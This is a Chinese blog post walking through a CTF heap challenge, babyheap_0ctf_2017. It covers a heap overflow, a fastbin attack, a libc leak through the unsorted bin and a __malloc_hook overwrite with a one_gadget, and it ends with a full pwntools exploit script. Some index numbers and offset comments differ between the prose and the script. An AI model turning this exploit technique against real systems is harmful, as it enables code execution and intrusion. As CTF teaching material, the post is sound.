buuctf pwn babyheap_0ctf_2017

已于 2023-09-17 00:10:30 修改
阅读量83 收藏
点赞数
文章标签: python 汇编 linux
于 2023-09-14 21:21:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60886511/article/details/132890909
版权

由于断断续续写了好久加上自身水平不足导致可能存在逻辑上的错误等等,如有错误,还望指出

个人博客

最终利用:
malloc_hook是一个libc上的函数,如果指针不为空则会执行其指针指向的函数,通过这个来getshell

1.查看程序

发现保护全开了,利用ida查看一下

挨个查看

switch里的判断条件(用来选择):

case 1(allocate,分配chunk):

case 2(fill,进行内容填充,存在堆溢出):

case 3(free,释放chunk):

case 4(dump,输出内容,可以以此获取main.arena88):

2.漏洞分析

1.由于unsorted bin中只有一个块时会将fb和bk指针指向main.arena+88处,而libc距main.aerna-offset(该offset是一个固定值,只是不同版本的libc里不同)

libc_base=main_arena_88-offset-88

2.因此我们要使一块chunk去到unsorted bin 再用dump泄露出来,这就需要我们让两个index来指向同一个chunk,一个释放掉使chunk到unsorted bin,另一个就可以通过dump来泄露main.arena+88的地址

要让两个index指向同一个chunk,就需要借助free来实现,通过 free两个index(chunk1,chunk2) ,使其到fastbin中,其会按照后进先出原则,再通过溢出使一个index2的fd指向chunk4,将原来的fastbin中chunk2->chunk1变换为了chunk2->chunk4,此时mallco (index1的大小)时会将chunk2分配给index1,而mallco (index2的大小)会将chunk4分配给index2【注意此时要修改chunk4的size和index2的大小一致】,然后通过溢出index3将chunk4的size值恢复,然后再mallco (index4的大小)再释放,这时chunk4就会进入unsorted bin ,并且index2也指向了chunk4,可以通过dump(index2)来泄露main.arena+88的地址

4.fastbin attack

原理:

通过double free 利用 :释放chunk1 和chunk2 然后fastbin 里就会形成

利用double free来再次释放chunk1,会变成:

此时申请后分配chunk1:

接着需要写入前面分配的chunk1来改变fd指向到想要写入的地址(此处是因为free了两次所以同一个chunk1一个再heap中,另一个在fastbin里,通过heap写入就能改写fastbin里的fd指向)

接着mallco chunk2和mallco chunk1,此时fastbin指向新指向的chunk3

此时再mallco 一次即可申请到新的chunk3,然后就可以进行改写内容

回到题目:

通过泄露的地址来获得libc的基地址, libc上的函数libc_mallco,该函数会调用mallco hook,是libc上的一个函数指针,若该指针不为空则执行它指向的函数 ,我们可以以此来getshell,用fastbin attack 将一个 libc 上的地址放入 fastbin 链表中,然后通过 malloc (),将该地址分配,这样就可以改写 libc 的内容,通过mallco hook来getshell(写入地址后再次mallco即可执行mallco hook)

http://t.csdn.cn/IzUkV

此时chunk4在unsorted bin中,我们需要mallco 0x60,再free使其放入到fastbin中,因为前面index2已经指向了chunk4,所以通过index2写入要修改的地址即可,然后mallco 2次,一个是chunk4,一个就是新的chunk为要修改的mallco hook

3.漏洞利用

1.先利用allocate得到chunk

allocate(0x10)  index0
allocate(0x10)  index1
allocate(0x10)  index2
allocate(0x10)  index3
allocate(0x80)  index4

2.利用free,使后续的两个index可以指向同一个chunk

free(1)
free(2)

【注意修改glibc版本】

patchelf --set-interpreter ~/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so --set-rpath ~/Tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ ~/Downloads/buuctf/babyheap_0ctf_2017

查看此时的堆(glibc 2.26版本以后会不一样),可以发现地址都是对齐的:

查看bins,此时是chunk2->chunk1:

查看该heap的内容,由下面的图也可以发现地址只有第一个字节不同,所以后面溢出修改一个字节为0x80就好:

溢出

利用index0来溢出改写index2的fd(不用index1是因为index1也被释放),利用index3来改写index4的size

payload1=p64(0)+p64(0) //填充index0的fd和bk(因为此处是作为存储数据来用,并不是存地址)
payload1+=p64(0)+p64(0x21)+p64(0)+p64(0)//index1的pre_size和size位和fd、bk
payload1+=p64(0)+p64(0x21)+p(0x80)//index2:pre_size、size、fd
fill(0,length(payload1),payload1)  //填充 index0进行溢出


payload2=p64(0)+p64(0)  //填充index3
payload2+=p64(0)+p64(0x21) //溢出修改index4的size位
fill(3,length(payload2),payload2)

index2的fd位0x80是因为堆始终是 4KB对齐 的,所以index4的第一个字节(小端序)必定是80(前面的index0~3都占了0x20)

【这里解释修改index4的size位,这里index4对应chunk4】

查看其 chunksize 与相应的 fastbin_index 是否匹配,
实际上 chunksize 的计算方法是 victim->size & ~(SIZE_BITS)),
而它对应的 index 计算方法为 (size) >> (SIZE_SZ == 8 ? 4 : 3) - 2,
这里 64位的平台对应的 SIZE_SZ 是8,则 fastbin_index 为 (size >> 4) - 2,
那么我们将 small chunk 的 size 域改写成 0x21 即可。

3.构造两个index指向同一个chunk(index2,index4都指向chunk4)

由于前面的溢出index2导致对应的chunk2的fd指向了chunk4(此时chunk2在fastbin表里,所以使chunk4也在fastbin表中),此时 fastbin->chunk2->chunk4

allocate(0x10)  //index1,此时会将chunk2分配给index1
allocate(0x10)  //index2,此时会将chunk4分配给index2

此时就有两个index指向同一个chunk了,接着改回来原来的index4的大小

payload3=p64(0)+p64(0)
payload3+=p64(0)+p64(0x91)
fill(3,length(payload3),payload3)

接着给index4分配chunk4(因为前面index2回收chunk4没有改变index4指向的chunk地址,所以给index分配的仍然是chunk4)

allocate(0x80) //给index4分配chunk4
free(4)  //释放chunk4,因为大于等于0x80,所以进入unsorted bin中

此时chunk4的fd和bk就指向main_arena+88

4.泄露main_arena_88地址,计算得到libc_base( main_arena相对libc固定偏移0x3c4b20,不同libc版本偏移不同

dump(2)
main_arena_88=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')
libc_base=main_arena_88-0x3c4b78   (0x3c4b0+88,一般2.23_64的偏移都是这个,不同libc版本会有不同

5.构造fake_chunk,使其能够溢出到malloc_hook

计算fake_chunk的地址(malloc_hook就在main_arena的上面,我们需要找一个malloc_hook附近能够构造chunk的地址作为fake_chunk):

main_arena-0x40+0xd的地方找到该地址,由于有保护,所以要用libc_base+偏移来到达该地址

fake_chunk=main_arena-0x40+0xd (mian_arena-0x33)
libc_base=main_arena+0x58-0x3c4b78
(main_arena-0x3c4b78=libc_base-0x58)	

fake_chunk=libc_base-0x58+0x3c4b78-0x40+0xd= libc_base+3c4aed

所以fake_chunk= libc_base+0x3c4aed

6.将fake_chunk地址写入fastbin中,便于后续溢出来getshell

由于此时chunk4仍然在unsorted bin中(index4被释放),而index2仍然指向chunk4,可以用index2来改写fd,所以要使chunk4进入fastbin中

allocate(0x60) //回收一部分chunk4
free(4)  //使chunk4进入fastbin中

payload4=p64(fake_chunk)  //改写chunk4的fd使fake_chunk进入fastbin
fill(2,length(payload4),payload4)

7.回收chunk4与fake_chunk来getshell( malloc_hook=main_arena-0x10 )

allocate(0x60)  //index4,分配chunk4
allocate(0x60)  //index5,分配fake_chunk

//因为 malloc_hook=main_arena-0x10,fake_chunk=mian_arena-0x33
//所以 malloc_hook=fake_chunk+0x23(fake_chunk+0x33-0x10)

payload5=p64(0)+p64(0)+p8(0)*3 //0x13
payload5+=p64(libc_base+0x4526a) //0x4526a由one_gadget查找得到
fill(5,length(payload5),payload5)

allocate(0x60) //执行一次就会执行malloc_hook,就可以getshell

exp:

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
p=remote('node4.buuoj.cn',25727)
#e=ELF("./babyheap_0ctf_2017")
#write_plt=e.plt["write"]
#read_plt=e.plt["read"]


def allocate(size):
    p.sendlineafter("Command: ","1")
    p.sendlineafter("Size: ",str(size))  #此处必须转成str()类型,下面同理

def fill(index,size,content):
    p.sendlineafter("Command: ","2")
    p.sendlineafter("Index: ",str(index))
    p.sendlineafter("Size: ",str(size))
    p.sendlineafter("Content: ",content)
    
def free(index):
    p.sendlineafter("Command: ","3")
    p.sendlineafter("Index: ",str(index))

def dump(index):
    p.sendlineafter("Command: ","4")
    p.sendlineafter("Index: ",str(index))

#步骤1(对应上面的讲解步骤)
allocate(0x10) 
allocate(0x10)
allocate(0x10)
allocate(0x10)
allocate(0x80)

#步骤2
free(1)
free(2)

payload1=p64(0)*2+p64(0)+p64(0x21)+p64(0)*3+p64(0x21)+p8(0x80)
fill(0,len(payload1),payload1)

payload2=p64(0)*3+p64(0x21)
fill(3,len(payload2),payload2)

#步骤3
allocate(0x10)
allocate(0x10)

payload3=p64(0)*3+p64(0x91)
fill(3,len(payload3),payload3)
allocate(0x80)
free(4)

#步骤4
dump(2)
main_arena_88=u64(p.recvuntil(b'\x7f')[-6:]+b'\x00\x00')

libc_base=main_arena_88-0x3c4b78 

#步骤5
fake_chunk= libc_base+0x3c4aed 

#步骤6
allocate(0x60) #回收一部分chunk4
free(4)  #使chunk4进入fastbin中

payload4=p64(fake_chunk)  #改写chunk4的fd使fake_chunk进入fastbin
fill(2,len(payload4),payload4)

#步骤7
allocate(0x60)  #index4,分配chunk4
allocate(0x60)  #index5,分配fake_chunk

#因为 malloc_hook=main_arena-0x10,fake_chunk=mian_arena-0x33
#所以 malloc_hook=fake_chunk+0x23(fake_chunk+0x33-0x10)

payload5=p64(0)+p64(0)+p8(0)*3  #0x13
payload5+=p64(libc_base+0x4526a)  #0x4526a由one_gadget查找得到
fill(6,len(payload5),payload5)

allocate(0x60)               #index6,执行一次就会执行malloc_hook,就可以getshell

p.interactive()

参考:
https://blog.csdn.net/think_ycx/article/details/77982439

https://bbs.kanxue.com/thread-223461.htm

https://blog.csdn.net/weixin_43847969/article/details/104897249

https://blog.csdn.net/mcmuyanga/article/details/108360375

关于堆的参数:
https://blog.csdn.net/weixin_43847969/article/details/104897249

m0_60886511
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_debug sudo ...
0ctf-2017-pwn-char
02-05
20170ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
[BUUCTF] babyheap_0ctf_2017
红叶的博客
03-28 796
有点回想起当初第一次拿到flag时的感觉,继续加油。 本题考察知识点:**Fastbin Attack** 与 **Unsorted Bin Attack。** 通过使用Fastbin Attack与堆溢出漏洞,我们可以绕过Free后指针置零,从而达到在置零指针后获取堆块fd指针。 通过Unsorted Bin Attack,我们可以泄露Libc地址。 然后我们再使用Fastbin Attack替换__malloc_hook 本文写给自己,也写给跟我一样全网寻找详细解答的师傅们。
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3786
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
[BUUCTF]-PWN:babyheap_0ctf_2017解析
2301_79326813的博客
01-10 982
但是这里要解释一点,为什么不能直接释放堆块4,虽然这样堆块4也能进入unsortedbin里,但是要注意free堆块后指向堆块的指针将会被置零,大致意思就是free了之后,index4就不指向那个堆块了,这时候dump(4)就是无效的,虽然那个堆块里面有mainarena+88的地址,但dump(4)不会打印出里面的地址,所以我们要让两个堆块的指针指向同一个堆块,这样在释放掉一个堆块时还能用另一个指针利用该堆块。后面alloc(0x60)与这里的0x7f有关。
[BUUCTF]PWN——babyheap_0ctf_2017
s_hiy_iyi的博客
10-28 53
atof()会扫描参数字符串,跳过前面的空格字符,直到遇上数字或正负符号才开始做转换,直到格式违规或遇到字符串结束标志‘\0’才会结束转换,返回一个double类型的数据。)意思是将八个字节的后者(v4)强制转换为8个字节的地址,而后再其前边加上星号就是提取指针“将指针指向的8个空间格子取出”,程序中的意思是,再将其以16进制形式打印出来。atoi()返回的是一个int型数据,atol()返回的是一个long int型数据。dword是指注册表的键值,每个word为2个字节,dword双字即为4个字节。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
【持续集成_05课_Linux部署SonarQube及结合开发项目部署】
weixin_42333261的博客
07-12 294
前置条件:sonarQube不能使用root账号进行启动,所以需要创建普通用户及。3)CMD上传qube文件-不能传到home路径下哦。2)添加用户、组名、密码。4)检查并解压上传的包。
聊聊如何在内网下构建大模型微调环境
python1234567_的博客
07-12 928
LlamaFactory新版更新后,还是比较方便,只是说llamafactory-cli命令的确是有点蒙,踩个坑就好了。对于LlamaFactory微调来说,本身不难,毕竟都是配置;主要是在内网环境下的依赖包拉取安装是真麻烦,但其实也还好。走一遍的话,还是可以学到很多的。​。
Python每日一题:回文数
最新发布
xiongxiaoxuan的博客
07-16 73
回文数是指正序(从左向右)和倒序(从右向左)读都是一样的整数。例如,121 是回文,而 123 不是。给你一个整数 x ,如果 x 是一个回文整数,返回 true;否则,返回 false。解释:从左向右读, 为 -121。从右向左读, 为 121-。因此它不是一个回文数。先将整数x转化为字符串形式,判断x和它的反转形态是否完全相等。解释:从右向左读, 为 01。需注意:True和False首字母大写!提示:-231
Python中使用三方库SpeechLib实现文本转换语音文件的示例(Win10)
m0_64880493的博客
07-16 88
开始用创建对象的方法CreateObject 分别创建了语音引擎对象与语音文件流对象。调用流对象的Open()方法实现语音流数据写入音频输出文件。
httpx 的使用
qq_39217312的博客
07-15 620
httpx 是一个可以支持 HTTP/2.0 的库还有一个是: hyper 库这里有一个由HTTP/2.0的网站: https://spa16.scrape.center/使用 requests 库 进行爬取 报错:安装: httpx pip3 install httpx 这样安装并不能支持 HTTP/2.0如果想要支持,需要这样安装:pip3 install httpx[http2]输出:这里访问的HTTP/1.0的网站,并且依次打印除了 , 响应状态码(status_code),响应头信息(header
Python与MQTT:构建物联网通信的桥梁
不会代码的小林
07-16 305
首先,让我们简要回顾一下MQTT。MQTT是一种基于发布/订阅模式的消息传输协议,它专为大量小型设备或远程设备以及网络状况不佳的环境而设计。MQTT协议的工作流程非常简单:发布者(Publisher)将消息发送到MQTT代理(Broker),然后订阅了相应主题的订阅者(Subscriber)从MQTT代理接收这些消息。这种解耦的通信方式,使得MQTT非常适合物联网场景下的设备间通信。
Gradio从入门到精通(1)---快速入门
疯狂飙车的蜗牛的博客
07-15 803
Gradio 是一个开源 Python 包,允许您为机器学习模型、API 或任何任意 Python 函数快速构建演示或 Web 应用程序。然后,您可以使用 Gradio 的内置共享功能在几秒钟内共享指向演示或 Web 应用程序的链接。无需 JavaScript、CSS 或 Web 托管经验!Gradio最大的特点就是简单,便捷,短短几行代码就可以快速构建大模型web应用程序;当前很多人工智能模型的演示都是使用Gradio打造的;您会注意到,为了制作第一个演示,您创建了该类的实例。
华为910b推理Qwen1.5-72b
weixin_41549308的博客
07-12 654
910b部署推理大模型
AIGC专栏13——ComfyUI 插件编写细节解析-以EasyAnimateV3为例
Bubbliiiing的学习小课堂
07-13 3554
最近在给EasyAnimateV3写ComfyUI的工作流,以方便别人测试。学习了ComfyUI的基本操作,也看了一下别人是怎么写的,自己也折腾了一下。在人工智能艺术创作的领域里,Stable Diffusion 凭借其开放源代码的特性,吸引了众多开发者与艺术家的目光,并且因为强大的社区支持而展现出强大的影响力。Stable Diffusion 的两大主流创作平台分别是 Stable Diffusion WebUI 与 ComfyUI。
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值